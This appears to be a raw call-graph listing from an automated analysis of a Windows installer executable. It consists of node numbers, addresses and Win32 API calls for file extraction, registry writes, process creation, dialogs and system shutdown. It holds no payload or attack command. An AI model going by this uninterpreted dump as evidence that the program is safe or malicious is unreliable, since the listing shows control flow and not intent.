4333->4334 4335 40166e 4334->4335 4336 4019e4 4337 402bbf 18 API calls 4336->4337 4338 4019eb 4337->4338 4339 402bbf 18 API calls 4338->4339 4340 4019f4 4339->4340 4341 4019fb lstrcmpiW 4340->4341 4342 401a0d lstrcmpW 4340->4342 4343 401a01 4341->4343 4342->4343 4344 4025e5 4345 402ba2 18 API calls 4344->4345 4352 4025f4 4345->4352 4346 40272d 4347 40263a ReadFile 4347->4346 4347->4352 4348 405dd6 ReadFile 4348->4352 4350 40267a MultiByteToWideChar 4350->4352 4351 40272f 4366 4060c5 wsprintfW 4351->4366 4352->4346 4352->4347 4352->4348 4352->4350 4352->4351 4354 4026a0 SetFilePointer MultiByteToWideChar 4352->4354 4355 402740 4352->4355 4357 405e34 SetFilePointer 4352->4357 4354->4352 4355->4346 4356 402761 SetFilePointer 4355->4356 4356->4346 4358 405e50 4357->4358 4359 405e6c 4357->4359 4360 405dd6 ReadFile 4358->4360 4359->4352 4361 405e5c 4360->4361 4361->4359 4362 405e75 SetFilePointer 4361->4362 4363 405e9d SetFilePointer 4361->4363 4362->4363 4364 405e80 4362->4364 4363->4359 4365 405e05 WriteFile 4364->4365 4365->4359 4366->4346 3510 401e66 3511 402bbf 18 API calls 3510->3511 3512 401e6c 3511->3512 3513 4052dd 25 API calls 3512->3513 3514 401e76 3513->3514 3528 40585e CreateProcessW 3514->3528 3517 40281e 3518 401edb CloseHandle 3518->3517 3519 401e8c WaitForSingleObject 3520 401e9e 3519->3520 3521 401eb0 GetExitCodeProcess 3520->3521 3531 406594 3520->3531 3522 401ec2 3521->3522 3523 401ecf 3521->3523 3535 4060c5 wsprintfW 3522->3535 3523->3518 3526 401ecd 3523->3526 3526->3518 3529 405891 CloseHandle 3528->3529 3530 401e7c 3528->3530 3529->3530 3530->3517 3530->3518 3530->3519 3532 4065b1 PeekMessageW 3531->3532 3533 401ea5 WaitForSingleObject 3532->3533 3534 4065a7 DispatchMessageW 3532->3534 3533->3520 3534->3532 3535->3526 3536 401767 3537 402bbf 18 API calls 3536->3537 3538 40176e 3537->3538 3539 401796 3538->3539 3540 40178e 3538->3540 3591 40617e lstrcpynW 3539->3591 3590 40617e lstrcpynW 3540->3590 3543 4017a1 3545 405b32 3 API calls 3543->3545 3544 401794 3547 406412 5 API calls 3544->3547 3546 4017a7 lstrcatW 3545->3546 3546->3544 3557 4017b3 3547->3557 3548 4064c1 2 API calls 3548->3557 3550 405d2e 2 API calls 3550->3557 3551 4017c5 CompareFileTime 3551->3557 3552 401885 3553 4052dd 25 API calls 3552->3553 3555 40188f 3553->3555 3554 4052dd 25 API calls 3556 401871 3554->3556 3575 4030e7 3555->3575 3557->3548 3557->3550 3557->3551 3557->3552 3561 4061a0 18 API calls 3557->3561 3566 40617e lstrcpynW 3557->3566 3573 40185c 3557->3573 3574 405d53 GetFileAttributesW CreateFileW 3557->3574 3592 4058c3 3557->3592 3560 4018b6 SetFileTime 3562 4018c8 FindCloseChangeNotification 3560->3562 3561->3557 3562->3556 3563 4018d9 3562->3563 3564 4018f1 3563->3564 3565 4018de 3563->3565 3568 4061a0 18 API calls 3564->3568 3567 4061a0 18 API calls 3565->3567 3566->3557 3569 4018e6 lstrcatW 3567->3569 3570 4018f9 3568->3570 3569->3570 3572 4058c3 MessageBoxIndirectW 3570->3572 3572->3556 3573->3554 3573->3556 3574->3557 3576 403112 3575->3576 3577 4030f6 SetFilePointer 3575->3577 3596 4031ef GetTickCount 3576->3596 3577->3576 3580 405dd6 ReadFile 3581 403132 3580->3581 3582 4031ef 43 API calls 3581->3582 3586 4018a2 3581->3586 3583 403149 3582->3583 3584 4031b5 ReadFile 3583->3584 3583->3586 3589 403158 3583->3589 3584->3586 3586->3560 3586->3562 3587 405dd6 ReadFile 3587->3589 3588 405e05 WriteFile 3588->3589 3589->3586 3589->3587 3589->3588 3590->3544 3591->3543 3593 4058d8 3592->3593 3594 405924 3593->3594 3595 4058ec MessageBoxIndirectW 3593->3595 3594->3557 3595->3594 3597 403347 3596->3597 3598 40321d 3596->3598 3599 402d9f 33 API calls 3597->3599 3609 40336e SetFilePointer 3598->3609 3605 403119 3599->3605 3601 403228 SetFilePointer 3607 40324d 3601->3607 3605->3580 3605->3586 3606 405e05 WriteFile 3606->3607 3607->3605 3607->3606 3608 403328 SetFilePointer 3607->3608 3610 403358 3607->3610 3613 406697 3607->3613 3620 402d9f 3607->3620 3608->3597 3609->3601 3611 405dd6 ReadFile 3610->3611 3612 40336b 3611->3612 3612->3607 3614 4066bc 3613->3614 3615 4066c4 3613->3615 3614->3607 3615->3614 3616 406754 GlobalAlloc 3615->3616 3617 40674b GlobalFree 3615->3617 3618 4067c2 GlobalFree 3615->3618 3619 4067cb GlobalAlloc 3615->3619 3616->3614 3616->3615 3617->3616 3618->3619 3619->3614 3619->3615 3621 402db0 3620->3621 3622 402dc8 3620->3622 3623 402db9 DestroyWindow 3621->3623 3630 402dc0 3621->3630 3624 402dd0 3622->3624 3625 402dd8 GetTickCount 3622->3625 3623->3630 3626 406594 2 API calls 3624->3626 3627 402de6 3625->3627 3625->3630 3626->3630 3628 402e1b CreateDialogParamW ShowWindow 3627->3628 3629 402dee 3627->3629 3628->3630 3629->3630 3635 402d83 3629->3635 3630->3607 3632 402dfc wsprintfW 3633 4052dd 25 API calls 3632->3633 3634 402e19 3633->3634 3634->3630 3636 402d92 3635->3636 3637 402d94 MulDiv 3635->3637 3636->3637 3637->3632 4374 401ee9 4375 402bbf 18 API calls 4374->4375 4376 401ef0 4375->4376 4377 4064c1 2 API calls 4376->4377 4378 401ef6 4377->4378 4380 401f07 4378->4380 4381 4060c5 wsprintfW 4378->4381 4381->4380 3638 403d6a 3639 403d82 3638->3639 3640 403ebd 3638->3640 3639->3640 3641 403d8e 3639->3641 3642 403f0e 3640->3642 3643 403ece GetDlgItem GetDlgItem 3640->3643 3644 403d99 SetWindowPos 3641->3644 3645 403dac 3641->3645 3647 403f68 3642->3647 3655 401389 2 API calls 3642->3655 3646 404242 19 API calls 3643->3646 3644->3645 3649 403db1 ShowWindow 3645->3649 3650 403dc9 3645->3650 3651 403ef8 SetClassLongW 3646->3651 3648 40428e SendMessageW 3647->3648 3667 403eb8 3647->3667 3697 403f7a 3648->3697 3649->3650 3652 403dd1 DestroyWindow 3650->3652 3653 403deb 3650->3653 3654 40140b 2 API calls 3651->3654 3707 4041cb 3652->3707 3656 403df0 SetWindowLongW 3653->3656 3657 403e01 3653->3657 3654->3642 3658 403f40 3655->3658 3656->3667 3661 403eaa 3657->3661 3662 403e0d GetDlgItem 3657->3662 3658->3647 3663 403f44 SendMessageW 3658->3663 3659 40140b 2 API calls 3659->3697 3660 4041cd DestroyWindow EndDialog 3660->3707 3664 4042a9 8 API calls 3661->3664 3666 403e20 SendMessageW IsWindowEnabled 3662->3666 3669 403e3d 3662->3669 3663->3667 3664->3667 3665 4041fc ShowWindow 3665->3667 3666->3667 3666->3669 3668 4061a0 18 API calls 3668->3697 3670 403e4a 3669->3670 3671 403e91 SendMessageW 3669->3671 3672 403e5d 3669->3672 3680 403e42 3669->3680 3670->3671 3670->3680 3671->3661 3674 403e65 3672->3674 3675 403e7a 3672->3675 3673 40421b SendMessageW 3676 403e78 3673->3676 3711 40140b 3674->3711 3678 40140b 2 API calls 3675->3678 3676->3661 3681 403e81 3678->3681 3679 404242 19 API calls 3679->3697 3680->3673 3681->3661 3681->3680 3682 404242 19 API calls 3683 403ff5 GetDlgItem 3682->3683 3684 404012 ShowWindow KiUserCallbackDispatcher 3683->3684 3685 40400a 3683->3685 3708 404264 KiUserCallbackDispatcher 3684->3708 3685->3684 3687 40403c EnableWindow 3690 404050 3687->3690 3688 404055 GetSystemMenu EnableMenuItem SendMessageW 3689 404085 SendMessageW 3688->3689 3688->3690 3689->3690 3690->3688 3709 404277 SendMessageW 3690->3709 3710 40617e lstrcpynW 3690->3710 3693 4040b3 lstrlenW 3694 4061a0 18 API calls 3693->3694 3695 4040c9 SetWindowTextW 3694->3695 3696 401389 2 API calls 3695->3696 3696->3697 3697->3659 3697->3660 3697->3667 3697->3668 3697->3679 3697->3682 3698 40410d DestroyWindow 3697->3698 3699 404127 CreateDialogParamW 3698->3699 3698->3707 3700 40415a 3699->3700 3699->3707 3701 404242 19 API calls 3700->3701 3702 404165 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3701->3702 3703 401389 2 API calls 3702->3703 3704 4041ab 3703->3704 3704->3667 3705 4041b3 ShowWindow 3704->3705 3706 40428e SendMessageW 3705->3706 3706->3707 3707->3665 3707->3667 3708->3687 3709->3690 3710->3693 3712 401389 2 API calls 3711->3712 3713 401420 3712->3713 3713->3680 4382 4021ea 4383 402bbf 18 API calls 4382->4383 4384 4021f0 4383->4384 4385 402bbf 18 API calls 4384->4385 4386 4021f9 4385->4386 4387 402bbf 18 API calls 4386->4387 4388 402202 4387->4388 4389 4064c1 2 API calls 4388->4389 4390 40220b 4389->4390 4391 40221c lstrlenW lstrlenW 4390->4391 4392 40220f 4390->4392 4394 4052dd 25 API calls 4391->4394 4393 4052dd 25 API calls 4392->4393 4396 402217 4392->4396 4393->4396 4395 40225a SHFileOperationW 4394->4395 4395->4392 4395->4396 3726 40156b 3727 401584 3726->3727 3728 40157b ShowWindow 3726->3728 3729 401592 ShowWindow 3727->3729 3730 402a4c 3727->3730 3728->3727 3729->3730 4397 40226e 4398 402275 4397->4398 4402 402288 4397->4402 4399 4061a0 18 API calls 4398->4399 4400 402282 4399->4400 4401 4058c3 MessageBoxIndirectW 4400->4401 4401->4402 4403 4014f1 SetForegroundWindow 4404 402a4c 4403->4404 3735 401673 3736 402bbf 18 API calls 3735->3736 3737 40167a 3736->3737 3738 402bbf 18 API calls 3737->3738 3739 401683 3738->3739 3740 402bbf 18 API calls 3739->3740 3741 40168c MoveFileW 3740->3741 3742 40169f 3741->3742 3748 401698 3741->3748 3743 4064c1 2 API calls 3742->3743 3746 4021e1 3742->3746 3745 4016ae 3743->3745 3744 401423 25 API calls 3744->3746 3745->3746 3747 40601f 38 API calls 3745->3747 3747->3748 3748->3744 4405 401cfa GetDlgItem GetClientRect 4406 402bbf 18 API calls 4405->4406 4407 401d2c LoadImageW SendMessageW 4406->4407 4408 401d4a DeleteObject 4407->4408 4409 402a4c 4407->4409 4408->4409 3994 40237b 3995 402381 3994->3995 3996 402bbf 18 API calls 3995->3996 3997 402393 3996->3997 3998 402bbf 18 API calls 3997->3998 3999 40239d RegCreateKeyExW 3998->3999 4000 4023c7 3999->4000 4004 402a4c 3999->4004 4001 4023e2 4000->4001 4002 402bbf 18 API calls 4000->4002 4003 4023ee 4001->4003 4006 402ba2 18 API calls 4001->4006 4005 4023d8 lstrlenW 4002->4005 4007 402409 RegSetValueExW 4003->4007 4008 4030e7 45 API calls 4003->4008 4005->4001 4006->4003 4009 40241f RegCloseKey 4007->4009 4008->4007 4009->4004 4011 4027fb 4012 402bbf 18 API calls 4011->4012 4013 402802 FindFirstFileW 4012->4013 4014 40282a 4013->4014 4018 402815 4013->4018 4015 402833 4014->4015 4019 4060c5 wsprintfW 4014->4019 4020 40617e lstrcpynW 4015->4020 4019->4015 4020->4018 4424 401dfd EnableWindow 4425 402a4c 4424->4425 4426 4014ff 4427 401507 4426->4427 4429 40151a 4426->4429 4428 402ba2 18 API calls 4427->4428 4428->4429 4430 401000 4431 401037 BeginPaint GetClientRect 4430->4431 4433 40100c DefWindowProcW 4430->4433 4434 4010f3 4431->4434 4437 401179 4433->4437 4435 401073 CreateBrushIndirect FillRect DeleteObject 4434->4435 4436 4010fc 4434->4436 4435->4434 4438 401102 CreateFontIndirectW 4436->4438 4439 401167 EndPaint 4436->4439 4438->4439 4440 401112 6 API calls 4438->4440 4439->4437 4440->4439 4448 401904 4449 40193b 4448->4449 4450 402bbf 18 API calls 4449->4450 4451 401940 4450->4451 4452 40596f 69 API calls 4451->4452 4453 401949 4452->4453 4454 402d04 4455 402d16 SetTimer 4454->4455 4456 402d2f 4454->4456 4455->4456 4457 402d7d 4456->4457 4458 402d83 MulDiv 4456->4458 4459 402d3d wsprintfW SetWindowTextW SetDlgItemTextW 4458->4459 4459->4457 4461 403985 4462 403990 4461->4462 4463 403994 4462->4463 4464 403997 GlobalAlloc 4462->4464 4464->4463 4465 402786 4466 40278d 4465->4466 4469 4029f7 4465->4469 4467 402ba2 18 API calls 4466->4467 4468 402798 4467->4468 4470 40279f SetFilePointer 4468->4470 4470->4469 4471 4027af 4470->4471 4473 4060c5 wsprintfW 4471->4473 4473->4469 4474 401907 4475 402bbf 18 API calls 4474->4475 4476 40190e 4475->4476 4477 4058c3 MessageBoxIndirectW 4476->4477 4478 401917 4477->4478 4479 401e08 4480 402bbf 18 API calls 4479->4480 4481 401e0e 4480->4481 4482 402bbf 18 API calls 4481->4482 4483 401e17 4482->4483 4484 402bbf 18 API calls 4483->4484 4485 401e20 4484->4485 4486 402bbf 18 API calls 4485->4486 4487 401e29 4486->4487 4488 401423 25 API calls 4487->4488 4489 401e30 ShellExecuteW 4488->4489 4490 401e61 4489->4490 4496 404390 lstrlenW 4497 4043b1 WideCharToMultiByte 4496->4497 4498 4043af 4496->4498 4498->4497 4499 401491 4500 4052dd 25 API calls 4499->4500 4501 401498 4500->4501 4509 401a15 4510 402bbf 18 API calls 4509->4510 4511 401a1e ExpandEnvironmentStringsW 4510->4511 4512 401a32 4511->4512 4514 401a45 4511->4514 4513 401a37 lstrcmpW 4512->4513 4512->4514 4513->4514 4515 402515 4516 402bbf 18 API calls 4515->4516 4517 40251c 4516->4517 4520 405d53 GetFileAttributesW CreateFileW 4517->4520 4519 402528 4520->4519 4521 402095 4522 402bbf 18 API calls 4521->4522 4523 40209c 4522->4523 4524 402bbf 18 API calls 4523->4524 4525 4020a6 4524->4525 4526 402bbf 18 API calls 4525->4526 4527 4020b0 4526->4527 4528 402bbf 18 API calls 4527->4528 4529 4020ba 4528->4529 4530 402bbf 18 API calls 4529->4530 4532 4020c4 4530->4532 4531 402103 CoCreateInstance 4536 402122 4531->4536 4532->4531 4533 402bbf 18 API calls 4532->4533 4533->4531 4534 401423 25 API calls 4535 4021e1 4534->4535 4536->4534 4536->4535 4537 401b16 4538 402bbf 18 API calls 4537->4538 4539 401b1d 4538->4539 4540 402ba2 18 API calls 4539->4540 4541 401b26 wsprintfW 4540->4541 4542 402a4c 4541->4542 4543 404696 4544 4046a6 4543->4544 4545 4046cc 4543->4545 4546 404242 19 API calls 4544->4546 4547 4042a9 8 API calls 4545->4547 4548 4046b3 SetDlgItemTextW 4546->4548 4549 4046d8 4547->4549 4548->4545 3338 40159b 3339 402bbf 18 API calls 3338->3339 3340 4015a2 SetFileAttributesW 3339->3340 3341 4015b4 3340->3341 3342 40541c 3343 4055c6 3342->3343 3344 40543d GetDlgItem GetDlgItem GetDlgItem 3342->3344 3346 4055f7 3343->3346 3347 4055cf GetDlgItem CreateThread FindCloseChangeNotification 3343->3347 3388 404277 SendMessageW 3344->3388 3349 405622 3346->3349 3350 405647 3346->3350 3351 40560e ShowWindow ShowWindow 3346->3351 3347->3346 3411 4053b0 OleInitialize 3347->3411 3348 4054ad 3354 4054b4 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3348->3354 3352 405682 3349->3352 3353 40562e 3349->3353 3397 4042a9 3350->3397 3393 404277 SendMessageW 3351->3393 3352->3350 3363 405690 SendMessageW 3352->3363 3356 405636 3353->3356 3357 40565c ShowWindow 3353->3357 3361 405522 3354->3361 3362 405506 SendMessageW SendMessageW 3354->3362 3394 40421b 3356->3394 3359 40567c 3357->3359 3360 40566e 3357->3360 3367 40421b SendMessageW 3359->3367 3366 4052dd 25 API calls 3360->3366 3368 405535 3361->3368 3369 405527 SendMessageW 3361->3369 3362->3361 3365 405655 3363->3365 3370 4056a9 CreatePopupMenu 3363->3370 3366->3359 3367->3352 3389 404242 3368->3389 3369->3368 3371 4061a0 18 API calls 3370->3371 3373 4056b9 AppendMenuW 3371->3373 3375 4056d6 GetWindowRect 3373->3375 3376 4056e9 TrackPopupMenu 3373->3376 3374 405545 3377 405582 GetDlgItem SendMessageW 3374->3377 3378 40554e ShowWindow 3374->3378 3375->3376 3376->3365 3380 405704 3376->3380 3377->3365 3379 4055a9 SendMessageW SendMessageW 3377->3379 3381 405571 3378->3381 3382 405564 ShowWindow 3378->3382 3379->3365 3383 405720 SendMessageW 3380->3383 3392 404277 SendMessageW 3381->3392 3382->3381 3383->3383 3384 40573d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3383->3384 3386 405762 SendMessageW 3384->3386 3386->3386 3387 40578b GlobalUnlock SetClipboardData CloseClipboard 3386->3387 3387->3365 3388->3348 3390 4061a0 18 API calls 3389->3390 3391 40424d SetDlgItemTextW 3390->3391 3391->3374 3392->3377 3393->3349 3395 404222 3394->3395 3396 404228 SendMessageW 3394->3396 3395->3396 3396->3350 3398 4042c1 GetWindowLongW 3397->3398 3408 40434a 3397->3408 3399 4042d2 3398->3399 3398->3408 3400 4042e1 GetSysColor 3399->3400 3401 4042e4 3399->3401 3400->3401 3402 4042f4 SetBkMode 3401->3402 3403 4042ea SetTextColor 3401->3403 3404 404312 3402->3404 3405 40430c GetSysColor 3402->3405 3403->3402 3406 404319 SetBkColor 3404->3406 3407 404323 3404->3407 3405->3404 3406->3407 3407->3408 3409 404336 DeleteObject 3407->3409 3410 40433d CreateBrushIndirect 3407->3410 3408->3365 3409->3410 3410->3408 3418 40428e 3411->3418 3413 4053d3 3417 4053fa 3413->3417 3421 401389 3413->3421 3414 40428e SendMessageW 3415 40540c OleUninitialize 3414->3415 3417->3414 3419 4042a6 3418->3419 3420 404297 SendMessageW 3418->3420 3419->3413 3420->3419 3423 401390 3421->3423 3422 4013fe 3422->3413 3423->3422 3424 4013cb MulDiv SendMessageW 3423->3424 3424->3423 3425 40229d 3426 4022a5 3425->3426 3427 4022ab 3425->3427 3428 402bbf 18 API calls 3426->3428 3429 4022b9 3427->3429 3430 402bbf 18 API calls 3427->3430 3428->3427 3431 4022c7 3429->3431 3432 402bbf 18 API calls 3429->3432 3430->3429 3433 402bbf 18 API calls 3431->3433 3432->3431 3434 4022d0 WritePrivateProfileStringW 3433->3434 4550 401f1d 4551 402bbf 18 API calls 4550->4551 4552 401f24 4551->4552 4553 406558 5 API calls 4552->4553 4554 401f33 4553->4554 4555 401fb7 4554->4555 4556 401f4f GlobalAlloc 4554->4556 4556->4555 4557 401f63 4556->4557 4558 406558 5 API calls 4557->4558 4559 401f6a 4558->4559 4560 406558 5 API calls 4559->4560 4561 401f74 4560->4561 4561->4555 4565 4060c5 wsprintfW 4561->4565 4563 401fa9 4566 4060c5 wsprintfW 4563->4566 4565->4563 4566->4555 3435 40249e 3445 402cc9 3435->3445 3437 4024a8 3438 402ba2 18 API calls 3437->3438 3439 4024b1 3438->3439 3440 4024d5 RegEnumValueW 3439->3440 3441 4024c9 RegEnumKeyW 3439->3441 3442 40281e 3439->3442 3440->3442 3443 4024ee RegCloseKey 3440->3443 3441->3443 3443->3442 3446 402bbf 18 API calls 3445->3446 3447 402ce2 3446->3447 3448 402cf0 RegOpenKeyExW 3447->3448 3448->3437 4567 40149e 4568 402288 4567->4568 4569 4014ac PostQuitMessage 4567->4569 4569->4568 3478 40231f 3479 402324 3478->3479 3480 40234f 3478->3480 3482 402cc9 19 API calls 3479->3482 3481 402bbf 18 API calls 3480->3481 3484 402356 3481->3484 3483 40232b 3482->3483 3485 402335 3483->3485 3489 40236c 3483->3489 3490 402bff RegOpenKeyExW 3484->3490 3486 402bbf 18 API calls 3485->3486 3487 40233c RegDeleteValueW RegCloseKey 3486->3487 3487->3489 3491 402c93 3490->3491 3494 402c2a 3490->3494 3491->3489 3492 402c50 RegEnumKeyW 3493 402c62 RegCloseKey 3492->3493 3492->3494 3501 406558 GetModuleHandleA 3493->3501 3494->3492 3494->3493 3496 402c87 RegCloseKey 3494->3496 3499 402bff 5 API calls 3494->3499 3498 402c76 3496->3498 3498->3491 3499->3494 3500 402ca2 RegDeleteKeyW 3500->3498 3502 406574 3501->3502 3503 40657e GetProcAddress 3501->3503 3507 4064e8 GetSystemDirectoryW 3502->3507 3505 402c72 3503->3505 3505->3498 3505->3500 3506 40657a 3506->3503 3506->3505 3508 40650a wsprintfW LoadLibraryExW 3507->3508 3508->3506 4570 401ca3 4571 402ba2 18 API calls 4570->4571 4572 401ca9 IsWindow 4571->4572 4573 401a05 4572->4573 4574 402a27 SendMessageW 4575 402a41 InvalidateRect 4574->4575 4576 402a4c 4574->4576 4575->4576 3714 40242a 3715 402cc9 19 API calls 3714->3715 3716 402434 3715->3716 3717 402bbf 18 API calls 3716->3717 3718 40243d 3717->3718 3719 402448 RegQueryValueExW 3718->3719 3722 40281e 3718->3722 3720 402468 3719->3720 3721 40246e RegCloseKey 3719->3721 3720->3721 3725 4060c5 wsprintfW 3720->3725 3721->3722 3725->3721 3731 40172d 3732 402bbf 18 API calls 3731->3732 3733 401734 SearchPathW 3732->3733 3734 40174f 3733->3734 4584 404a33 4585 404a43 4584->4585 4586 404a5f 4584->4586 4595 4058a7 GetDlgItemTextW 4585->4595 4588 404a92 4586->4588 4589 404a65 SHGetPathFromIDListW 4586->4589 4590 404a7c SendMessageW 4589->4590 4591 404a75 4589->4591 4590->4588 4593 40140b 2 API calls 4591->4593 4592 404a50 SendMessageW 4592->4586 4593->4590 4595->4592 4596 4027b4 4597 4027ba 4596->4597 4598 4027c2 FindClose 4597->4598 4599 402a4c 4597->4599 4598->4599 3749 4033b6 SetErrorMode GetVersion 3750 4033eb 3749->3750 3751 4033f1 3749->3751 3752 406558 5 API calls 3750->3752 3753 4064e8 3 API calls 3751->3753 3752->3751 3754 403407 lstrlenA 3753->3754 3754->3751 3755 403417 3754->3755 3756 406558 5 API calls 3755->3756 3757 40341f 3756->3757 3758 406558 5 API calls 3757->3758 3759 403426 #17 OleInitialize SHGetFileInfoW 3758->3759 3837 40617e lstrcpynW 3759->3837 3761 403463 GetCommandLineW 3838 40617e lstrcpynW 3761->3838 3763 403475 GetModuleHandleW 3764 40348d 3763->3764 3765 405b5f CharNextW 3764->3765 3766 40349c CharNextW 3765->3766 3767 4035c6 GetTempPathW 3766->3767 3777 4034b5 3766->3777 3839 403385 3767->3839 3769 4035de 3770 4035e2 GetWindowsDirectoryW lstrcatW 3769->3770 3771 403638 DeleteFileW 3769->3771 3772 403385 12 API calls 3770->3772 3849 402e41 GetTickCount GetModuleFileNameW 3771->3849 3775 4035fe 3772->3775 3773 405b5f CharNextW 3773->3777 3775->3771 3778 403602 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3775->3778 3776 40364c 3779 403703 ExitProcess OleUninitialize 3776->3779 3785 4036ef 3776->3785 3787 405b5f CharNextW 3776->3787 3777->3773 3782 4035b1 3777->3782 3784 4035af 3777->3784 3783 403385 12 API calls 3778->3783 3780 403839 3779->3780 3781 403719 3779->3781 3790 403841 GetCurrentProcess OpenProcessToken 3780->3790 3791 4038bd ExitProcess 3780->3791 3789 4058c3 MessageBoxIndirectW 3781->3789 3935 40617e lstrcpynW 3782->3935 3792 403630 3783->3792 3784->3767 3879 4039c7 3785->3879 3802 40366b 3787->3802 3795 403727 ExitProcess 3789->3795 3796 403859 LookupPrivilegeValueW AdjustTokenPrivileges 3790->3796 3797 40388d 3790->3797 3792->3771 3792->3779 3793 4036ff 3793->3779 3796->3797 3798 406558 5 API calls 3797->3798 3801 403894 3798->3801 3799 4036c9 3804 405c3a 18 API calls 3799->3804 3800 40372f 3938 405846 3800->3938 3805 4038a9 ExitWindowsEx 3801->3805 3806 4038b6 3801->3806 3802->3799 3802->3800 3808 4036d5 3804->3808 3805->3791 3805->3806 3809 40140b 2 API calls 3806->3809 3808->3779 3936 40617e lstrcpynW 3808->3936 3809->3791 3810 403750 lstrcatW lstrcmpiW 3810->3779 3812 40376c 3810->3812 3811 403745 lstrcatW 3811->3810 3814 403771 3812->3814 3815 403778 3812->3815 3941 4057ac CreateDirectoryW 3814->3941 3946 405829 CreateDirectoryW 3815->3946 3816 4036e4 3937 40617e lstrcpynW 3816->3937 3820 40377d SetCurrentDirectoryW 3822 403798 3820->3822 3823 40378d 3820->3823 3950 40617e lstrcpynW 3822->3950 3949 40617e lstrcpynW 3823->3949 3826 4061a0 18 API calls 3827 4037d7 DeleteFileW 3826->3827 3828 4037e4 CopyFileW 3827->3828 3834 4037a6 3827->3834 3828->3834 3829 40382d 3830 40601f 38 API calls 3829->3830 3832 403834 3830->3832 3831 40601f 38 API calls 3831->3834 3832->3779 3833 4061a0 18 API calls 3833->3834 3834->3826 3834->3829 3834->3831 3834->3833 3835 40585e 2 API calls 3834->3835 3836 403818 CloseHandle 3834->3836 3835->3834 3836->3834 3837->3761 3838->3763 3840 406412 5 API calls 3839->3840 3842 403391 3840->3842 3841 40339b 3841->3769 3842->3841 3843 405b32 3 API calls 3842->3843 3844 4033a3 3843->3844 3845 405829 2 API calls 3844->3845 3846 4033a9 3845->3846 3847 405d82 2 API calls 3846->3847 3848 4033b4 3847->3848 3848->3769 3951 405d53 GetFileAttributesW CreateFileW 3849->3951 3851 402e84 3878 402e91 3851->3878 3952 40617e lstrcpynW 3851->3952 3853 402ea7 3854 405b7e 2 API calls 3853->3854 3855 402ead 3854->3855 3953 40617e lstrcpynW 3855->3953 3857 402eb8 GetFileSize 3858 402fb9 3857->3858 3876 402ecf 3857->3876 3859 402d9f 33 API calls 3858->3859 3861 402fc0 3859->3861 3860 403358 ReadFile 3860->3876 3863 402ffc GlobalAlloc 3861->3863 3861->3878 3955 40336e SetFilePointer 3861->3955 3862 403054 3865 402d9f 33 API calls 3862->3865 3864 403013 3863->3864 3870 405d82 2 API calls 3864->3870 3865->3878 3867 402fdd 3868 403358 ReadFile 3867->3868 3871 402fe8 3868->3871 3869 402d9f 33 API calls 3869->3876 3872 403024 CreateFileW 3870->3872 3871->3863 3871->3878 3873 40305e 3872->3873 3872->3878 3954 40336e SetFilePointer 3873->3954 3875 40306c 3877 4030e7 45 API calls 3875->3877 3876->3858 3876->3860 3876->3862 3876->3869 3876->3878 3877->3878 3878->3776 3880 406558 5 API calls 3879->3880 3881 4039db 3880->3881 3882 4039e1 3881->3882 3883 4039f3 3881->3883 3965 4060c5 wsprintfW 3882->3965 3884 40604b 3 API calls 3883->3884 3885 403a23 3884->3885 3886 403a42 lstrcatW 3885->3886 3888 40604b 3 API calls 3885->3888 3889 4039f1 3886->3889 3888->3886 3956 403c9d 3889->3956 3892 405c3a 18 API calls 3893 403a74 3892->3893 3894 403b08 3893->3894 3896 40604b 3 API calls 3893->3896 3895 405c3a 18 API calls 3894->3895 3897 403b0e 3895->3897 3898 403aa6 3896->3898 3899 403b1e LoadImageW 3897->3899 3902 4061a0 18 API calls 3897->3902 3898->3894 3905 403ac7 lstrlenW 3898->3905 3909 405b5f CharNextW 3898->3909 3900 403bc4 3899->3900 3901 403b45 RegisterClassW 3899->3901 3904 40140b 2 API calls 3900->3904 3903 403b7b SystemParametersInfoW CreateWindowExW 3901->3903 3934 403bce 3901->3934 3902->3899 3903->3900 3908 403bca 3904->3908 3906 403ad5 lstrcmpiW 3905->3906 3907 403afb 3905->3907 3906->3907 3911 403ae5 GetFileAttributesW 3906->3911 3912 405b32 3 API calls 3907->3912 3914 403c9d 19 API calls 3908->3914 3908->3934 3910 403ac4 3909->3910 3910->3905 3913 403af1 3911->3913 3915 403b01 3912->3915 3913->3907 3916 405b7e 2 API calls 3913->3916 3917 403bdb 3914->3917 3966 40617e lstrcpynW 3915->3966 3916->3907 3919 403be7 ShowWindow 3917->3919 3920 403c6a 3917->3920 3922 4064e8 3 API calls 3919->3922 3921 4053b0 5 API calls 3920->3921 3923 403c70 3921->3923 3924 403bff 3922->3924 3925 403c74 3923->3925 3926 403c8c 3923->3926 3927 403c0d GetClassInfoW 3924->3927 3931 4064e8 3 API calls 3924->3931 3933 40140b 2 API calls 3925->3933 3925->3934 3930 40140b 2 API calls 3926->3930 3928 403c21 GetClassInfoW RegisterClassW 3927->3928 3929 403c37 DialogBoxParamW 3927->3929 3928->3929 3932 40140b 2 API calls 3929->3932 3930->3934 3931->3927 3932->3934 3933->3934 3934->3793 3935->3784 3936->3816 3937->3785 3939 406558 5 API calls 3938->3939 3940 403734 lstrcatW 3939->3940 3940->3810 3940->3811 3942 4057fd GetLastError 3941->3942 3943 403776 3941->3943 3942->3943 3944 40580c SetFileSecurityW 3942->3944 3943->3820 3944->3943 3945 405822 GetLastError 3944->3945 3945->3943 3947 405839 3946->3947 3948 40583d GetLastError 3946->3948 3947->3820 3948->3947 3949->3822 3950->3834 3951->3851 3952->3853 3953->3857 3954->3875 3955->3867 3957 403cb1 3956->3957 3967 4060c5 wsprintfW 3957->3967 3959 403d22 3960 4061a0 18 API calls 3959->3960 3961 403d2e SetWindowTextW 3960->3961 3962 403a52 3961->3962 3963 403d4a 3961->3963 3962->3892 3963->3962 3964 4061a0 18 API calls 3963->3964 3964->3963 3965->3889 3966->3894 3967->3959 4600 401b37 4601 401b44 4600->4601 4602 401b88 4600->4602 4605 401bcd 4601->4605 4610 401b5b 4601->4610 4603 401bb2 GlobalAlloc 4602->4603 4604 401b8d 4602->4604 4607 4061a0 18 API calls 4603->4607 4618 402288 4604->4618 4621 40617e lstrcpynW 4604->4621 4606 4061a0 18 API calls 4605->4606 4605->4618 4608 402282 4606->4608 4607->4605 4613 4058c3 MessageBoxIndirectW 4608->4613 4619 40617e lstrcpynW 4610->4619 4611 401b9f GlobalFree 4611->4618 4613->4618 4614 401b6a 4620 40617e lstrcpynW 4614->4620 4616 401b79 4622 40617e lstrcpynW 4616->4622 4619->4614 4620->4616 4621->4611 4622->4618 4623 402537 